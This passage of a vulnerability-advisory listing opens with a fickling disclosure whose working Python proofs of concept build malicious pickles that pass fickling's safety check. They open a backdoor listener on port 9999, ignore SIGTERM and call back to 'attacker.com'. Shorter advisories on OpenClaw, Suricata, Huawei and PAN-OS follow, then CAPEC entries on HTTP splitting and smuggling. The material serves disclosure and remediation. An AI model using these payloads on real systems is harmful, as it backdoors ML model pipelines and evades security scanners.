payload.write(sbu(\"127.0.0.1\"))                   # push argument\n    payload.write(b\"o\")                               # OBJ: call SMTP(\u0027127.0.0.1\u0027)\n    payload.write(b\"0\")                               # POP: discard result\n    payload.write(b\"N.\")                              # NONE + STOP\n\n    frame_data = payload.getvalue()\n    buf.write(struct.pack(\"\u003cQ\", len(frame_data)))\n    buf.write(frame_data)\n    return buf.getvalue()\n\nimport fickling, tempfile, os\ndata = make_obj_pop_bypass()\npath = os.path.join(tempfile.mkdtemp(), \"bypass.pkl\")\nwith open(path, \"wb\") as f:\n    f.write(data)\n\nprint(fickling.is_likely_safe(path))\n# Output: True  \u003c-- BYPASSED (network connection invisible to fickling)\n```\n\nfickling decompiles this to:\n```python\nfrom smtplib import SMTP\nresult = None\n```\n\nYet at runtime, `SMTP(\u0027127.0.0.1\u0027)` executes and opens a TCP connection.\n\n**CLI verification:**\n```bash\n$ fickling --check-safety bypass.pkl; echo \"EXIT: $?\"\nEXIT: 0    # BYPASSED\n```\n\n**Comparison with REDUCE (same function, detected):**\n```bash\n$ fickling --check-safety reduce_smtp.pkl; echo \"EXIT: $?\"\nWarning: Fickling detected that the pickle file may be unsafe.\nEXIT: 1    # DETECTED\n```\n\n### Backdoor listener PoC (most impactful)\n\nA pickle that opens a TCP listener on port 9999, binding to all interfaces:\n\n```python\nimport io, struct\n\ndef sbu(s):\n    b = s.encode()\n    return b\"\\x8c\" + struct.pack(\"\u003cB\", len(b)) + b\n\ndef binint(n):\n    return b\"J\" + struct.pack(\"\u003ci\", n)\n\ndef make_backdoor():\n    buf = io.BytesIO()\n    buf.write(b\"\\x80\\x04\\x95\")  # PROTO 4 + FRAME\n\n    payload = io.BytesIO()\n    # OBJ+POP: TCPServer((\u00270.0.0.0\u0027, 9999), BaseRequestHandler)\n    payload.write(b\"(\")                                          # MARK\n    payload.write(sbu(\"socketserver\") + sbu(\"TCPServer\") + b\"\\x93\")  # STACK_GLOBAL\n    payload.write(b\"(\")                                          # MARK (inner tuple)\n    payload.write(sbu(\"0.0.0.0\"))                                # host\n    payload.write(binint(9999))                                  # port\n    payload.write(b\"t\")                                          # TUPLE\n    payload.write(sbu(\"socketserver\") + sbu(\"BaseRequestHandler\") + b\"\\x93\")  # handler\n    payload.write(b\"o\")                                          # OBJ\n    payload.write(b\"0\")                                          # POP\n    payload.write(b\"N.\")                                         # NONE + STOP\n\n    frame_data = payload.getvalue()\n    buf.write(struct.pack(\"\u003cQ\", len(frame_data)))\n    buf.write(frame_data)\n    return buf.getvalue()\n\nimport fickling\ndata = make_backdoor()\nwith open(\"/tmp/backdoor.pkl\", \"wb\") as f:\n    f.write(data)\n\nprint(fickling.is_likely_safe(\"/tmp/backdoor.pkl\"))\n# Output: True  \u003c-- BYPASSED\n\nimport pickle, socket\nserver = pickle.loads(data)\n# Port 9999 is now LISTENING on all interfaces\n\ns = socket.socket()\ns.connect((\"127.0.0.1\", 9999))\nprint(\"Connected to backdoor port!\")  # succeeds\ns.close()\nserver.server_close()\n```\n\n### Multi-stage combined PoC\n\nA single pickle combining signal suppression + backdoor listener + outbound callback + file persistence:\n\n```python\n# All four operations in one pickle, all invisible to fickling:\n# 1. signal.signal(SIGTERM, SIG_IGN) - suppress graceful shutdown\n# 2. socketserver.TCPServer((\u00270.0.0.0\u0027, 9999), BaseRequestHandler) - backdoor\n# 3. smtplib.SMTP(\u0027attacker.com\u0027) - C2 callback\n# 4. sqlite3.connect(\u0027/tmp/.marker\u0027) - persistence marker\n\n# fickling reports: LIKELY_SAFE\n# All 4 operations execute at runtime\n```\n\n\n**`always_check_safety()` verification:**\n```python\nimport fickling, pickle\n\nfickling.always_check_safety()\nwith open(\"poc_obj_multi.pkl\", \"rb\") as f:\n    result = pickle.load(f)\n# No UnsafeFileError raised -- all 4 malicious operations executed\n```\n\n## Impact\n\nAn attacker can distribute a malicious pickle file (e.g., a backdoored ML model) that passes all fickling safety checks. Demonstrated impacts:\n\n- **Backdoor network listener**: `socketserver.TCPServer((\u00270.0.0.0\u0027, 9999), BaseRequestHandler)` opens a port on all interfaces. The TCPServer constructor calls `server_bind()` and `server_activate()`, so the port is open immediately after `pickle.loads()` returns.\n- **Process persistence**: `signal.signal(SIGTERM, SIG_IGN)` makes the process ignore SIGTERM. In Kubernetes/Docker/ECS, the backdoor stays alive for 30+ seconds per restart attempt.\n- **Outbound exfiltration**: `smtplib.SMTP(\u0027attacker.com\u0027)` opens an outbound TCP connection. The attacker\u0027s server learns the victim\u0027s IP and hostname.\n- **File creation on disk**: `sqlite3.connect(path)` creates a file at an attacker-chosen path.\n\nA single pickle combines all operations. In cloud ML environments, this enables persistent backdoor access while resisting graceful shutdown. This affects any application using fickling as a safety gate for ML model files.\n\nThe bypass works for any stdlib module NOT in fickling\u0027s `UNSAFE_IMPORTS` blocklist. Blocked modules (os, subprocess, socket, builtins, etc.) are still detected at the import level.\n\n## Suggested Fix\n\nAdd `new_variable()` to `Obj.run()` (lines 1348 and 1350), applying the same pattern used by `Reduce.run()` (line 1300):\n\n```python\n# fickle.py, Obj.run():\n-       if args or hasattr(kls, \"__getinitargs__\") or not isinstance(kls, type):\n-           interpreter.stack.append(ast.Call(kls, args, []))\n-       else:\n-           interpreter.stack.append(ast.Call(kls, kls, []))\n+       if args or hasattr(kls, \"__getinitargs__\") or not isinstance(kls, type):\n+           call = ast.Call(kls, args, [])\n+       else:\n+           call = ast.Call(kls, kls, [])\n+       var_name = interpreter.new_variable(call)\n+       interpreter.stack.append(ast.Name(var_name, ast.Load()))\n```\n\nAlso apply to `NewObj.run()` (line 1414) and `NewObjEx.run()` (line 1426) for defense in depth.",
  "id": "GHSA-mxhj-88fx-4pcv",
  "modified": "2026-02-24T21:41:31Z",
  "published": "2026-02-24T21:41:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-mxhj-88fx-4pcv"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/ff423dade2bb1f72b2b48586c022fac40cbd9a4a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fickling: OBJ opcode call invisibility bypasses all safety checks"
}

GHSA-MXMG-3P7M-2GHR

Vulnerability from github – Published: 2026-03-21 03:31 – Updated: 2026-03-24 19:07
VLAI
Summary
Duplicate Advisory: OpenClaw: system.run approval identity mismatch could execute a different binary than displayed
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hwpq-rrpf-pgcq. This link is maintained to preserve external references.

Original Description

OpenClaw versions prior to 2026.2.25 contain an approval-integrity bypass vulnerability in system.run where rendered command text is used as approval identity while trimming argv token whitespace, but runtime execution uses raw argv. An attacker can craft a trailing-space executable token to execute a different binary than what the approver displayed, allowing unexpected command execution under the OpenClaw runtime user when they can influence command argv and reuse an approval context.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2026.2.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T19:07:00Z",
    "nvd_published_at": "2026-03-21T01:17:09Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-hwpq-rrpf-pgcq. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.25 contain an approval-integrity bypass vulnerability in system.run where rendered command text is used as approval identity while trimming argv token whitespace, but runtime execution uses raw argv. An attacker can craft a trailing-space executable token to execute a different binary than what the approver displayed, allowing unexpected command execution under the OpenClaw runtime user when they can influence command argv and reuse an approval context.",
  "id": "GHSA-mxmg-3p7m-2ghr",
  "modified": "2026-03-24T19:07:00Z",
  "published": "2026-03-21T03:31:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hwpq-rrpf-pgcq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32065"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/03e689fc89bbecbcd02876a95957ef1ad9caa176"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-approval-identity-mismatch-in-system-run-command-execution"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: OpenClaw: system.run approval identity mismatch could execute a different binary than displayed",
  "withdrawn": "2026-03-24T19:07:00Z"
}

GHSA-P4HG-MVQ8-47JJ

Vulnerability from github – Published: 2022-05-24 17:05 – Updated: 2024-10-22 18:32
VLAI
Details

An issue was discovered in Suricata 5.0.0. It is possible to bypass/evade any tcp based signature by overlapping a TCP segment with a fake FIN packet. The fake FIN packet is injected just before the PUSH ACK packet we want to bypass. The PUSH ACK packet (containing the data) will be ignored by Suricata because it overlaps the FIN packet (the sequence and ack number are identical in the two packets). The client will ignore the fake FIN packet because the ACK flag is not set. Both linux and windows clients are ignoring the injected packet.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-18792"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-01-06T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Suricata 5.0.0. It is possible to bypass/evade any tcp based signature by overlapping a TCP segment with a fake FIN packet. The fake FIN packet is injected just before the PUSH ACK packet we want to bypass. The PUSH ACK packet (containing the data) will be ignored by Suricata because it overlaps the FIN packet (the sequence and ack number are identical in the two packets). The client will ignore the fake FIN packet because the ACK flag is not set. Both linux and windows clients are ignoring the injected packet.",
  "id": "GHSA-p4hg-mvq8-47jj",
  "modified": "2024-10-22T18:32:03Z",
  "published": "2022-05-24T17:05:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18792"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OISF/suricata/commit/1c63d3905852f746ccde7e2585600b2199cefb4b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OISF/suricata/commit/fa692df37a796c3330c81988d15ef1a219afc006"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00032.html"
    },
    {
      "type": "WEB",
      "url": "https://redmine.openinfosecfoundation.org/issues/3324"
    },
    {
      "type": "WEB",
      "url": "https://redmine.openinfosecfoundation.org/issues/3394"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P6X2-6XX4-X843

Vulnerability from github – Published: 2023-06-16 15:30 – Updated: 2024-04-04 04:54
VLAI
Details

There is a misinterpretation of input vulnerability in Huawei Printer. Successful exploitation of this vulnerability may cause the printer service to be abnormal.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-48471"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-16T13:15:09Z",
    "severity": "HIGH"
  },
  "details": "There is a misinterpretation of input vulnerability in Huawei Printer. Successful exploitation of this vulnerability may cause the printer service to be abnormal.",
  "id": "GHSA-p6x2-6xx4-x843",
  "modified": "2024-04-04T04:54:57Z",
  "published": "2023-06-16T15:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48471"
    },
    {
      "type": "WEB",
      "url": "https://www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-moivihp-73cabdde-en"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PC4W-X9P8-64J7

Vulnerability from github – Published: 2022-02-11 00:00 – Updated: 2022-02-18 00:00
VLAI
Details

PAN-OS software provides options to exclude specific websites from URL category enforcement and those websites are blocked or allowed (depending on your rules) regardless of their associated URL category. This is done by creating a custom URL category list or by using an external dynamic list (EDL) in a URL Filtering profile. When the entries in these lists have a hostname pattern that does not end with a forward slash (/) or a hostname pattern that ends with an asterisk (), any URL that starts with the specified pattern is considered a match. Entries with a caret (^) at the end of a hostname pattern match any top level domain. This may inadvertently allow or block more URLs than intended and allowing more URLs than intended represents a security risk. For example: example.com will match example.com.website.test example.com. will match example.com.website.test example.com.^ will match example.com.test You should take special care when using such entries in policy rules that allow traffic. Where possible, use the exact list of hostname names ending with a forward slash (/) instead of using wildcards. PAN-OS 10.1 versions earlier than PAN-OS 10.1.3; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 9.1 versions earlier than PAN-OS 9.1.12; all PAN-OS 9.0 versions; PAN-OS 8.1 versions earlier than PAN-OS 8.1.21, and Prisma Access 2.2 and 2.1 versions do not allow customers to change this behavior without changing the URL category list or EDL.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-0011"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-10T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "PAN-OS software provides options to exclude specific websites from URL category enforcement and those websites are blocked or allowed (depending on your rules) regardless of their associated URL category. This is done by creating a custom URL category list or by using an external dynamic list (EDL) in a URL Filtering profile. When the entries in these lists have a hostname pattern that does not end with a forward slash (/) or a hostname pattern that ends with an asterisk (*), any URL that starts with the specified pattern is considered a match. Entries with a caret (^) at the end of a hostname pattern match any top level domain. This may inadvertently allow or block more URLs than intended and allowing more URLs than intended represents a security risk. For example: example.com will match example.com.website.test example.com.* will match example.com.website.test example.com.^ will match example.com.test You should take special care when using such entries in policy rules that allow traffic. Where possible, use the exact list of hostname names ending with a forward slash (/) instead of using wildcards. PAN-OS 10.1 versions earlier than PAN-OS 10.1.3; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 9.1 versions earlier than PAN-OS 9.1.12; all PAN-OS 9.0 versions; PAN-OS 8.1 versions earlier than PAN-OS 8.1.21, and Prisma Access 2.2 and 2.1 versions do not allow customers to change this behavior without changing the URL category list or EDL.",
  "id": "GHSA-pc4w-x9p8-64j7",
  "modified": "2022-02-18T00:00:57Z",
  "published": "2022-02-11T00:00:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0011"
    },
    {
      "type": "WEB",
      "url": "https://security.paloaltonetworks.com/CVE-2022-0011"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

No mitigation information available for this CWE.

CAPEC-105: HTTP Request Splitting

An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).

See CanPrecede relationships for possible consequences.

CAPEC-273: HTTP Response Smuggling

An adversary manipulates and injects malicious content in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., server).

See CanPrecede relationships for possible consequences.

CAPEC-34: HTTP Response Splitting

An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.

See CanPrecede relationships for possible consequences.